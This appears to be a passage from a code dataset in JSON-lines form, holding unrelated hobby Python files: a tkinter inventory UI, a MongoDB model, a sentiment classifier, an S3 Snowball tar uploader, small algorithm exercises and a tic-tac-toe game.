activeforeground='white', font=('roboto', 9, 'bold'))\n Menu7.grid(row=0, column=12, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=13, pady=10)\n\n Menu9 = Button(MenuFrame, text = 'Log Out', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.logout)\n Menu9.grid(row=0, column=14, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=15, pady=10)\n\n\n Date = datetime.now()\n Menu10 = Label(MenuFrame, text=f\"{Date:%A, %B, %d, %Y}\", font=('roboto', 9, 'bold'), bg='green', fg='white')\n Menu10.grid(row=0, column=17, padx=5, pady=10)\n Time = strftime('%I:%M:%S')\n Menu11 = Label(MenuFrame, text=Time, font=('roboto', 9, 'bold'), bg='green', fg='white')\n Menu11.grid(row=0, column=18, pady=10)\n # refresh the clock label every second\n def tick():\n Menu11.config(text=strftime('%I:%M:%S'))\n Menu11.after(1000, tick)\n Menu11.after(1000, tick)\n\n # Second Frames & Menu\n SideFrame = LabelFrame(window, height=300, width=150)\n SideFrame.pack(fill=Y, expand='no', anchor=W, padx=10, pady=40)\n\n\n SideMenu = Button(SideFrame, text='Add Product', font=('roboto', 9, 'bold'), bg='#d11c03', fg='white', bd=0, cursor='hand2', activebackground='#d11c03', activeforeground='white', command=self.addp)\n SideMenu.grid(row=0, column=0, padx=10, pady=7)\n\n\n\n # Center Frames & Labels\n Sales = LabelFrame(window, text=\"Our Products\", height=275, width=648, font=('roboto', 9, 'bold'), fg='green')\n Sales.pack(fill=X, expand='no')\n Sales.place(x=130, y=75)\n\n Style = ttk.Style()\n Style.theme_use('clam')\n Style.configure('Treeview',\n font=('roboto', 10, 'bold'),\n background='#f7f3f2',\n rowheight=20,\n activebackground=\"#81C44C\")\n\n Style.map('Treeview', background=[('selected', 'green')])\n # #bd2505\n\n Tscroll = Scrollbar(Sales, orient='vertical')\n Tscroll.pack(side=RIGHT, fill=Y)\n\n SalesView = ttk.Treeview(Sales, yscrollcommand=Tscroll.set, selectmode='extended')\n SalesView.pack(pady=10, padx=10)\n Tscroll.configure(command=SalesView.yview)\n SalesView['columns'] = ('PID', 'PRODUCT NAME', 'UNIT', 'DATE')\n\n SalesView.column('#0', width=0, stretch=NO)\n SalesView.column('PID', anchor=CENTER, width=70)\n SalesView.column('PRODUCT NAME', anchor=CENTER, width=140)\n SalesView.column('UNIT', anchor=CENTER, width=120)\n SalesView.column('DATE', anchor=CENTER, width=75)\n \n\n SalesView.heading('#0', text='', anchor=CENTER)\n SalesView.heading('PID', text='PID', anchor=CENTER)\n SalesView.heading('PRODUCT NAME', text='PRODUCT NAME', anchor=CENTER)\n SalesView.heading('UNIT', text='UNIT', anchor=CENTER)\n SalesView.heading('DATE', text='DATE', anchor=CENTER)\n\n LiveUp = Label(window, text='Products Live Updates', font=('roboto', 10, 'bold'), bg='#d11c03', fg='white')\n LiveUp.place(x=617, y=82)\n\n LiveUpF = LabelFrame(window, text='', width=190, height=226)\n LiveUpF.pack(fill=Y, expand='no', side=RIGHT)\n LiveUpF.place(x=600, y=115)\n\n PEX = Label(LiveUpF, text='Product: Quantity Produced', font=('roboto', 10, 'bold')).place(x=1, y=2)\n\n PP1 = Label(LiveUpF, text='Product 1:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=30)\n PP2 = Label(LiveUpF, text='Product 2:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=50)\n PP3 = Label(LiveUpF, text='Product 3:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=70)\n PP4 = Label(LiveUpF, text='Product 4:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=90)\n PP5 = Label(LiveUpF, text='Product 5:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=110)\n PP6 = 
Label(LiveUpF, text='Product 6:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=130)\n PPR1 = Label(LiveUpF, text='120000', font=('roboto', 10, 'bold')).place(x=80, y=30)\n PPR2 = Label(LiveUpF, text='130000', font=('roboto', 10, 'bold')).place(x=80, y=50)\n PPR3 = Label(LiveUpF, text='140000', font=('roboto', 10, 'bold')).place(x=80, y=70)\n PPR4 = Label(LiveUpF, text='150000', font=('roboto', 10, 'bold')).place(x=80, y=90)\n PPR5 = Label(LiveUpF, text='160000', font=('roboto', 10, 'bold')).place(x=80, y=110)\n PPR6 = Label(LiveUpF, text='170000', font=('roboto', 10, 'bold')).place(x=80, y=130)\n \n\n # SrcDate = DateEntry(window, selectmode='day')\n # SrcDate.place(x=140, y=370)\n\n # SrcBtn = Button(window, text='Search', font=('roboto', 10, 'bold'), bg='green', fg='white', cursor='hand2', command=src)\n # SrcBtn.place(x=260, y=365)\n\n\n SalesData()\n\n\n def dashb(self):\n win = Toplevel()\n dashboard.Dashboard(win)\n self.window.withdraw()\n win.deiconify()\n\n def prod(self):\n win = Toplevel()\n products.Products(win)\n self.window.withdraw()\n win.deiconify()\n\n def saless(self):\n win = Toplevel()\n sales.Sales(win)\n self.window.withdraw()\n win.deiconify()\n\n def cus(self):\n win = Toplevel()\n customers.Customers(win)\n self.window.withdraw()\n win.deiconify()\n\n def addp(self):\n win = Toplevel()\n addproduct.AddProduct(win)\n self.window.withdraw()\n win.deiconify()\n\n def addc(self):\n win = Toplevel()\n addcustomer.AddCustomer(win)\n self.window.withdraw()\n win.deiconify()\n\n def adds(self):\n win = Toplevel()\n addsales.AddSales(win)\n self.window.withdraw()\n win.deiconify()\n \n def logout(self):\n win = Toplevel()\n signin.Signin(win)\n self.window.withdraw()\n win.deiconify()\n\ndef products():\n window = Tk()\n Products(window)\n window.mainloop()\n\nif __name__ == '__main__':\n products()","repo_name":"GbolahanAlaba/GLBL","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33447955943","text":"from bson.objectid import ObjectId\nfrom .modal import Modal\n\n\nclass LoveModal(Modal):\n def __init__(self) -> None:\n super().__init__(collectionName=\"loves\", validator={\n '$jsonSchema': {\n 'bsonType': 'object',\n 'title': \"Loves Object Validation\",\n 'required': ['user_id', 'post_id'],\n 'properties': {\n 'user_id': {\n 'bsonType': 'string',\n 'description': \"'user_id' must be a string and is required\"\n },\n 'post_id': {\n 'bsonType': 'string',\n 'description': \"'post_id' must be a string and is required\"\n },\n }\n }\n })\n\n def readAll(self, userId: str):\n \"\"\"\n Return all the loves that a paticular user did\n :userId str: The id of the user\n :return: object\n \"\"\"\n data = self.collection.find({'user_id': userId})\n return data\n\n def readAllLoves(self, postId: str):\n \"\"\"\n Return all the loves on a paticular post\n :postId: The id of the post\n :return: object\n \"\"\"\n data = self.collection.find({'user_id': postId})\n return data\n\n def isUserLovedPost(self, userId: str, postId: str) -> bool:\n loveData = self.read({'user_id': userId, 'post_id': postId})\n if loveData is not None:\n return True\n return False\n","repo_name":"Uday-lal/insta_clone","sub_path":"server/model/loveModal.py","file_name":"loveModal.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} 
+{"seq_id":"6685952785","text":"from sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.pipeline import Pipeline\r\nimport pickle\r\nimport mysql.connector\r\nimport json\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"\",\r\n database=\"project\"\r\n)\r\n\r\n## TOKENIZING\r\ncount_vect = CountVectorizer()\r\nfilobjek=open(\"sklearn_try/train_data\",'rb')\r\ntrain_data=pickle.load(filobjek)\r\nX_train_counts = count_vect.fit_transform(train_data)\r\n# print(train_data)\r\n\r\n## TF TRANSFORMER\r\nfilobjek=open(\"sklearn_try/train_count\",'rb')\r\ntrain_count=pickle.load(filobjek)\r\ntf_transformer = TfidfTransformer().fit(train_count)\r\n# print(train_count)\r\n\r\ntest_data=list()\r\nmycursor = mydb.cursor()\r\nmycursor.execute(\"SELECT * FROM data_crawling_baru\")\r\nmyresult = mycursor.fetchall()\r\nfor id_crawl,konten,id_tes in myresult:\r\n test_data.append(konten)\r\n\r\nfilobjek=open(\"sklearn_try/model_train\",'rb')\r\nclff=pickle.load(filobjek)\r\nX_new_counts = count_vect.transform(test_data)\r\nX_new_tf = tf_transformer.transform(X_new_counts)\r\npredicted = clff.predict(X_new_tf)\r\n\r\nsentimen=list()\r\nfor doc, category in zip(test_data, predicted):\r\n # print('%r => %s' % (doc, category))\r\n sentimen.append(category)\r\n\r\npos=0\r\nneg=0\r\nfor status in sentimen:\r\n if status==\"positif\":\r\n pos=pos+1\r\n elif status==\"negatif\":\r\n neg=neg+1\r\n\r\n\r\nhasil_sentimen={\"positif\":pos,\"negatif\":neg}\r\njson_sentimen=json.dumps(hasil_sentimen)\r\nprint(json_sentimen)","repo_name":"ahmadhafidh/analysis-of-sentiment-ranking-and-rating-apps","sub_path":"sklearn_try/try_new_datasentimen.py","file_name":"try_new_datasentimen.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36802178816","text":"#-*- encoding: utf8 -*-\n'''\nstatus: failed\nversion: v11\nway: using multi-part uploading\nref: https://gist.github.com/teasherm/bb73f21ed2f3b46bc1c2ca48ec2c1cf5\nchangelog:\n - 2020.02.19\n - adding fifo operation to reducing for big file which is over max_part_size \n - removing tarfiles_one_time logic\n - spliting buffer by max_part_size\n - 2020.02.18:\n - supprt snowball limit:\n - max_part_size: 512mb\n - min_part_size: 5mb\n - 2020.02.14: \n - modifying for python3 \n - support korean in Windows\n - 2020.02.12: adding features \n - gen_filelist by size\n - 2020.02.10: changing filename from tar_to_s3_v7_multipart.py to snowball_uploader_8.py\n - adding features which can split tar file by size and count.\n - adding feature which create file list\n - showing help message\n'''\n\nimport boto3\nimport tarfile\nimport io\nimport os.path\nfrom datetime import datetime\nimport sys\nimport shutil\n\nbucket_name = \"your-own-dest-seoul\"\ns3 = boto3.client('s3', endpoint_url='https://s3.ap-northeast-2.amazonaws.com')\n#s3 = boto3.client('s3', region_name='ap-northeast-2', endpoint_url='https://s3.ap-northeast-2.amazonaws.com', aws_access_key_id=None, aws_secret_access_key=None)\n#tarfiles_one_time = 1000\nmax_size = 100 * 1000 ** 2 # 70GB\nmax_part_size = 20 * 1024 ** 2 # 100MB\nmin_part_size = 5 * 1024 ** 2 # 5MB\ntarget_path = '.' ## very important!! 
change to your source directory\nif os.name == 'nt':\n filelist_dir = \"C:/tmp/fl_logdir_dkfjpoiwqjefkdjf/\" #for windows\nelse:\n filelist_dir = '/tmp/fl_logdir_dkfjpoiwqjefkdjf/' #for linux\n\n#source_file = ''\n\n## Caution: you have to modify rename_file function to fit your own naming rule\n#def rename_file(org_file):\n# return org_file.replace('\\n','') + \"_new_buffer\"\n#org_files_list = open(source_file).readlines()\n#target_files_list = list(map(rename_file, org_files_list))\n## to use same name (org file name == target file name), uncomment below line\n#target_files_list = org_files_list\n\n#### don't need to modify from here\ncurrent_time = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n#key_name = ('snowball-batch-%s-%s.tar' % (source_file, current_time))\n#key_name = ('snowball-batch-%s.tar' % ( current_time))\n\nparts = []\n#s3_location = \"s3://\" + bucket_name + \"/\" + batch_tar\n\ndef gen_filelist():\n sum_size = 0\n fl_prefix = 'fl_'\n fl_index = 1\n shutil.rmtree(filelist_dir,ignore_errors=True)\n try:\n os.mkdir(filelist_dir)\n except: pass\n print('generating file list by size %s bytes' % max_size)\n for r,d,f in os.walk(target_path):\n for file in f:\n file_name = os.path.join(r,file)\n fl_name = filelist_dir + '/' + fl_prefix + str(fl_index) + \".txt\"\n sum_size = sum_size + os.path.getsize(file_name)\n if max_size < sum_size:\n fl_index = fl_index + 1 \n sum_size = 0\n print('%s' % file_name)\n with open(fl_name, 'a', encoding='utf8') as fl_content:\n fl_content.write(file_name + '\\n') \n print('file lists are generated!!')\n print('check %s' % filelist_dir)\n return os.listdir(filelist_dir)\n\n#def add_metadata_to_s3(bucket_name, key_name):\n# s3.copy_object(Key=key_name, Bucket=bucket_name,\n# CopySource={\"Bucket\": bucket_name, \"Key\": key_name},\n# Metadata={\"snowball-auto-extract\": \"true\"},\n# MetadataDirective=\"REPLACE\")\ndef log_error(org_file, str_suffix):\n with open(error_file,'a+', encoding='utf8') as err:\n err.write(org_file + str_suffix)\ndef log_success(target_file, str_suffix):\n with open(successlog_file,'a+', encoding='utf8') as success:\n success.write(target_file + str_suffix)\n\n#def flush_mem(out):\n# out.seek(0)\n# out.truncate()\n\ndef create_mpu():\n mpu = s3.create_multipart_upload(Bucket=bucket_name, Key=key_name, Metadata={\"snowball-auto-extract\": \"true\"})\n mpu_id = mpu[\"UploadId\"]\n return mpu_id\n\ndef upload_mpu(mpu_id, data, index):\n #part = s3.upload_part(Body=data, Bucket=bucket_name, Key=key_name, UploadId=mpu_id, PartNumber=index, ContentLength=max_buf_size)\n part = s3.upload_part(Body=data, Bucket=bucket_name, Key=key_name, UploadId=mpu_id, PartNumber=index)\n parts.append({\"PartNumber\": index, \"ETag\": part[\"ETag\"]})\n #print ('parts list: %s' % str(parts))\n return parts\n\ndef complete_mpu(mpu_id, parts):\n result = s3.complete_multipart_upload(\n Bucket=bucket_name,\n Key=key_name,\n UploadId=mpu_id,\n MultipartUpload={\"Parts\": parts})\n return result\n\ndef copy_to_snowball(org_files_list, target_files_list):\n recv_buf = io.BytesIO()\n mpu_id = create_mpu()\n parts_index = 1\n with tarfile.open(fileobj=recv_buf, mode=\"w\") as tar:\n for index in range(len(org_files_list)):\n org_file = org_files_list[index].replace('\\n','')\n target_file = target_files_list[index].replace('\\n','')\n print ('\\n########################')\n print ('0. program is starting')\n if os.path.isfile(org_file):\n tar.add(org_file, arcname=target_file)\n print ('1. %s is archiving\\n' % target_file )\n print ('1. 
recv_buf size: %s' % len(recv_buf.getvalue()))\n log_success(target_file, \" is archived successfully\\n\")\n ###################\n print ('%s is uploading\\n' % key_name )\n print (\"2. recv_buf pos: %s\" % recv_buf.tell())\n recv_buf_size = recv_buf.tell()\n cur_pos = 0\n if recv_buf_size > max_part_size:\n print('max file is checked')\n print('3.big recv_buf size: %s' % recv_buf_size)\n print('3.big recv_buf pos : %s' % recv_buf.tell())\n while recv_buf_size > max_part_size:\n print('4.sending big : %s' % recv_buf.tell())\n recv_buf.seek(0,0)\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(max_part_size), parts_index)\n parts_index += 1\n print('4.sent big : %s' % recv_buf.tell())\n tmp_buf = io.BytesIO() # added for FIFO operation\n tmp_buf.write(recv_buf.read()) # added for FIFO operation\n print('4.moved recv to tmp')\n recv_buf = tmp_buf\n #cur_pos = cur_pos + max_part_size + 1\n print('4.1.big recv_buf pos: %s' % recv_buf.tell())\n print('4.2.big recv_buf size: %s' % len(recv_buf.getvalue()))\n recv_buf_size = recv_buf.tell()\n if recv_buf_size >= min_part_size:\n recv_buf.seek(0,0)\n print('5.sending big-small peek : %s' % recv_buf.peek())\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(max_part_size), parts_index)\n parts_index += 1\n recv_buf.truncate(0)\n print('5.big-small recv_buf size: %s' % len(recv_buf.getvalue()))\n print('5.big-small recv_buf pos : %s' % recv_buf.tell())\n else:\n print('6 remaining buf of big is %s' % recv_buf_size )\n #spared_buf_size = recv_buf_size\n #pass\n else:\n #if spared_buf_size:\n # cur_pos = spared_buf_size * -1\n if recv_buf_size < min_part_size:\n print('7. normal recev buffer should be passed')\n print('7.1 recv_buf size: %s' % len(recv_buf.getvalue()))\n print('7.2 recv_buf pos : %s' % recv_buf.tell())\n #recv_buf.seek(0,0)\n #mpu_parts = upload_mpu(mpu_id, recv_buf.read(), parts_index)\n #parts_index += 1\n #recv_buf.seek(0)\n #recv_buf.truncate(0)\n ###################\n else:\n log_error(org_file,\" does not exist\\n\")\n print (org_file + ' is not exist...............................................\\n')\n print (\"8. final recv_buf size: \" + str(len(recv_buf.getvalue())))\n print('8.1 final recv_buf pos : %s' % recv_buf.tell())\n recv_buf.seek(0,0)\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(), parts_index)\n parts_index += 1\n print (\"8. 
%s is uploaded\" % key_name)\n complete_mpu(mpu_id, mpu_parts)\n ### print metadata\n meta_out = s3.head_object(Bucket=bucket_name, Key=key_name)\n print ('\\n\\n metadata info: %s' % str(meta_out)) \n log_success(str(meta_out), '!!\\n')\n print (\"\\n\\n tar file: %s\" % key_name)\n log_success(key_name, ' is uploaded successfully\\n')\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print (\"Usage: %s genlist | cp_snowball | help\" % sys.argv[0]) \n sys.exit()\n elif sys.argv[1] == \"genlist\":\n gen_filelist()\n elif sys.argv[1] == \"cp_snowball\":\n source_files = os.listdir(filelist_dir)\n for sf in source_files:\n error_file = ('error_%s_%s.log' % (sf, current_time))\n successlog_file = ('success_%s_%s.log' % (sf, current_time))\n source_file = os.path.join(filelist_dir, sf)\n org_files_list = open(source_file, encoding='utf8').readlines()\n target_files_list = org_files_list\n #line_break = int(len(org_files_list) / tarfiles_one_time + 1)\n #final_line_list = [ i*int(tarfiles_one_time)-1 for i in range(1,line_break)]\n #final_line_list.append(len(org_files_list)-1)\n key_name = ('snowball-%s-%s.tar' % (sf[:-4], current_time))\n copy_to_snowball(org_files_list, target_files_list)\n parts = []\n else:\n print (\"Usage: %s 'genlist | cp_snowball | help'\" % sys.argv[0])\n","repo_name":"hatsari/article","sub_path":"aws/s3_snowball/working/snowball_uploader_13_almost_success.py","file_name":"snowball_uploader_13_almost_success.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"38"} +{"seq_id":"28140688163","text":"import sympy\n\nfrom numpy import array as array\nfrom numpy import mat as mat\nfrom numpy import zeros as zeros\nfrom numpy.linalg import det as det\n\nfrom math import sqrt as sqrt\n\nnum_term = 3\n\na = sympy.symarray(\"a\",num_term)\nb = sympy.symarray(\"b\",num_term)\n\nr,s = sympy.symbols(\"r, s\")\nmonomials = array([1,r,s])\n\nert = a.dot(monomials)\nest = b.dot(monomials)\neqt = sqrt(0.5)*(est-ert)\n\nnum_equation = 6\neq_array = sympy.symarray(\"temp\", num_equation)\n\neq_array[0] = ert.subs([(r,0), (s,0)])\neq_array[1] = ert.subs([(r,1), (s,0)])\neq_array[2] = est.subs([(r,0), (s,0)])\neq_array[3] = est.subs([(r,0), (s,1)])\neq_array[4] = eqt.subs([(r,1), (s,0)])\neq_array[5] = eqt.subs([(r,0), (s,1)])\n\n\nnum_variable = a.size + b.size\n\nx = sympy.symarray(\"temp\", num_variable)\nfor i in range(0, a.size):\n x[i] = a[i]\nfor i in range(0, b.size):\n x[i + a.size] = b[i]\n\nA = mat(zeros((num_equation,num_variable)))\nfor i in range (0,num_equation) : \n eq = eq_array[i] \n for j in range (0, num_variable) :\n target_variable = x[j]\n A[i, j] = eq.coeff(target_variable)\n\nprint(det(A))\n\n# mrt, mst, mqt = sympy.symbols(\"mrt, mst, mqt\")\n# b = array([mrt, mrt, mst, mst, mqt, mqt])\n# b = mat(b).T\n\n# x = A.I * b\n# print(x)\n\n\n\n\n\n# er1,es2,er3,es3 = sympy.symbols(\"er1 es2 er3 es3\")\n\n# c = sqrt(0.5)\n\n# A = mat(\n# [[1, 0, 0, 0, 0, 0],\n# [1, 1, 0, 0, 0, 0],\n# [0, 0, 0, 1, 0, 0],\n# [0, 0, 0, 1, 0, 1], \n# [-c, -c, 0, c, c, 0],\n# [-c, 0, -c, c, 0, c]\n# ])\n\n# A_inv = inv(A)\n\n# b = mat([[er1],[er1],[es2],[es2],[c*(es3-er3)],[c*(es3-er3)]])\n\n# print(A_inv * b)","repo_name":"rla523at/Study","sub_path":"code/Python/2004_(Lee_&_Bathe)/MITC3.py","file_name":"MITC3.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74844206830","text":"from 
plotutils import *\nfrom vidutils import load_video_frames, get_face_probs\nfrom audioutils import get_audio_probs\nfrom tensorflow import keras\nimport joblib\nimport numpy as np\nimport argparse\nimport os\nimport warnings\n\n\ndef get_current_aud_prob(ts, aud_probs):\n for key in aud_probs:\n if ts >= key:\n return aud_probs[key]\n\n\ndef get_vid_probs(aud_probs, face_probs, timestamps, theta=.5):\n vid_probs = []\n for ts, face_prob in zip(timestamps, face_probs):\n aud_prob = get_current_aud_prob(ts, aud_probs)\n if face_prob is not None:\n vid_probs.append(theta * face_prob + (1-theta) * aud_prob)\n else:\n vid_probs.append(aud_prob)\n return vid_probs\n\n\ndef main(vidpath, resultspath, resultname):\n vmodel = keras.models.load_model('assets/keras_vgg19_84acc.h5')\n amodel = joblib.load('assets/audio_mlp_classifier.joblib')\n frames, faces, timestamps = load_video_frames(vidpath, skip=10)\n face_probs = get_face_probs(vmodel, faces)\n aud_probs = get_audio_probs(amodel, vidpath)\n print('aud_probs', aud_probs)\n print('face_probs', face_probs)\n probs = get_vid_probs(aud_probs, face_probs, timestamps) # [.2, .3, ...]\n leveled_probs = smooth_probs(probs, 3, 1)\n title = get_basename(vidpath)\n savepath = os.path.join(resultspath, resultname or title)\n tsplot(timestamps, probs, savepath + '.jpg')\n show_frames(probs, frames, savepath + '_frames.png')\n tsjson(timestamps, leveled_probs, savepath + '.json')\n\n\n# get vidpath, resultspath from command line if provided, else default\ndef parseargs():\n parser = argparse.ArgumentParser(\n description='Demo for shouting action recognition in videos.')\n parser.add_argument('--vidpath', help='The path to an .mp4 file.')\n parser.add_argument(\n '--resultspath', help='The path to a folder to store the results of analysis.')\n parser.add_argument(\n '--resultname', help='The base name of the result files to be generated. 
If none, use vidname.')\n args = parser.parse_args()\n vidpath = args.vidpath or './videos/demo.mov'\n resultspath = args.resultspath or './results'\n resultname = args.resultname or None\n return vidpath, resultspath, resultname\n \n\n\nif __name__ == '__main__':\n vidpath, resultspath, resultname = parseargs()\n assert os.path.exists(vidpath), 'Video path does not exist'\n assert os.path.exists(resultspath), 'Results path does not exist'\n main(vidpath, resultspath, resultname)\n","repo_name":"josiahcoad/ActionRecognition","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39658506898","text":"#!/usr/bin/env python\n\ndef longestCommonSubsequence(text1: str, text2: str) -> int:\n m = len(text1) \n n = len(text2)\n dp = [[0 for i in range(n + 1)] for j in range(m + 1)]\n\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if text1[i - 1] == text2[j - 1]:\n dp[i][j] = dp[i - 1][j - 1] + 1\n else:\n dp[i][j] = max(dp[i - 1][j], dp[i][j - 1])\n \n return dp[-1][-1]\n\nif __name__ == '__main__':\n x = \"abcde\"\n y = \"ace\"\n print(\"The longest common subsequence length of the input strings is: \")\n print(longestCommonSubsequence(x, y))","repo_name":"ymtowya/CS5800-code","sub_path":"assign9/as9_1.py","file_name":"as9_1.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11499610944","text":"from types import SimpleNamespace\n\n\ndef get_default_configs():\n cfg = SimpleNamespace(**{})\n cfg.model_dir = 'models/'\n\n cfg.device = 'cuda:0'\n cfg.batch_size = 32\n cfg.num_workers = 4\n cfg.base_lr = 5e-5\n cfg.warmup_factor = 10\n cfg.num_epochs = 50\n cfg.folds_to_run = [0]\n cfg.patience = 10\n cfg.seed = 67\n cfg.amp = True\n\n cfg.ver_note = 'v1'\n cfg.sample = None\n\n cfg.backbone = 'tf_efficientnet_b3_ns'\n cfg.backbone_pretrained = True\n\n return cfg\n","repo_name":"gallegi/AnyCV","sub_path":"commons/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38102664538","text":"\"\"\" Valid Mountain Array\nGiven an array of integers arr, return true if and only if it is a valid mountain array.\n\nRecall that arr is a mountain array if and only if:\n\narr.length >= 3\nThere exists some i with 0 < i < arr.length - 1 such that:\narr[0] < arr[1] < ... < arr[i - 1] < arr[i]\narr[i] > arr[i + 1] > ... > arr[arr.length - 1]\n\n##### Solution\nWe can use two pointers for this problem one starting from left and one from right. We loop over the entire array\nand increase the left index when arr[left+1]>index[left] and decrease the right index by one when arr[right-1]>index[right].\nAt the end when left is equal to right and both are not zero, it is a valid mountain array. 
We do not want\neither pointer to finish at an edge of the array: left stuck at 0 means the values never\nincreased, and right stuck at the last index means they never decreased.\n\"\"\"\n\n\nclass Solution:\n    def validMountainArray(self, arr) -> bool:\n        # start a left pointer and a right pointer\n        left, right = 0, len(arr) - 1\n        # loop over each element in the array\n        for i in range(len(arr)):\n            # if the array is increasing from left, increase the left by one (bounds-checked)\n            if left + 1 < len(arr) and arr[left + 1] > arr[left]:\n                left += 1\n            # if the array is increasing from right, decrease the right by one (bounds-checked)\n            if right > 0 and arr[right - 1] > arr[right]:\n                right -= 1\n        # the pointers must meet at an interior peak (not at either end)\n        return left == right and not (left == 0 or right == len(arr) - 1)","repo_name":"RustamyF/data-structure-Python","sub_path":"src/algostructure/arrays/code/valid_mountain.py","file_name":"valid_mountain.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37324235096","text":"from random import randrange\n\n\ndef DisplayBoard(board):\n#\n# the function accepts one parameter containing the board's current status\n# and prints it out to the console\n# \n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[0][0],board[0][1],board[0][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[1][0],board[1][1],board[1][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[2][0],board[2][1],board[2][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n\n\ndef EnterMove(board):\n#\n# the function accepts the board's current status, asks the user about their move, \n# checks the input and updates the board according to the user's decision\n#\n free_squares = MakeListOfFreeFields(board)\n user = int(input('Select the Box to mark : '))\n if 0 < user < 10:\n if free_squares[user-1] == 'R':\n print('Box already occupied. 
Select another')\n else:\n i,j = free_squares[user-1]\n board[i][j] = 'O'\n return board \n\n\ndef MakeListOfFreeFields(board):\n#\n# the function browses the board and builds a list of all the free squares; \n# the list consists of tuples, while each tuple is a pair of row and column numbers\n#\n free_squares = list()\n for i in range(3):\n for j in range(3):\n if board[i][j] == 'X' or board[i][j] == 'O':\n free_squares.append('R')\n else:\n free_squares.append((i,j))\n #print(free_squares)\n return free_squares\n\n\ndef VictoryFor(board, sign):\n#\n# the function analyzes the board status in order to check if \n# the player using 'O's or 'X's has won the game\n# \n check = True\n count = 0\n\n combinations = [\n [(0,0),(0,1),(0,2)],\n [(1,0),(1,1),(1,2)],\n [(2,0),(2,1),(2,2)],\n [(0,0),(1,0),(2,0)],\n [(0,1),(1,1),(2,1)],\n [(0,2),(1,2),(2,2)],\n [(0,0),(1,1),(2,2)],\n [(0,2),(1,1),(2,0)]\n ]\n\n for row in combinations:\n for pair in row:\n i,j = pair\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n count = 0\n\n if check == False and sign == 'X':\n print('Computer Won!')\n elif check == False and sign == 'O':\n print('You Won!')\n return check\n \n \"\"\"\n #check Rows\n for i in range(3):\n for j in range(3):\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n #check Columns\n for i in range(3):\n for j in range(3):\n if board[j][i] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\n #check left middles\n for i in range(3):\n for j in range(i,i+1):\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\n #check Right middles\n \n for i in range(2,-1,-1):\n for j in range():\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\"\"\"\n \ndef DrawMove(board):\n#\n# the function draws the computer's move and updates the board\n#\n if type(board[1][1]) == int:\n board[1][1] = 'X'\n else:\n free_squares = MakeListOfFreeFields(board)\n while True:\n comp = randrange(10)\n if free_squares[comp-1] == 'R':\n continue\n else:\n i,j = free_squares[comp-1]\n board[i][j] = 'X'\n return board\n return board\n \n\ndef main():\n count = 0\n board = [[1,2,3],[4,5,6],[7,8,9]]\n check = True \n while check and count < 4: \n board = DrawMove(board)\n check = VictoryFor(board, 'X')\n DisplayBoard(board)\n \n #if computer win no need to take user input so use continue\n if check == False:\n continue\n board = EnterMove(board)\n check = VictoryFor(board, 'O')\n \n #if use wins dispaly the Board\n if check == False:\n DisplayBoard(board)\n count +=1 \n \n #if no one wins and turns completed then display the board\n if count == 4:\n DisplayBoard(board)\n \nif __name__ == \"__main__\":\n main()\n\n","repo_name":"SnRahman/MY-Codes","sub_path":"tic_toc_toe.py","file_name":"tic_toc_toe.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26177074158","text":"import unittest\n\nimport dwd\n\n\nclass DWDTest(unittest.TestCase):\n 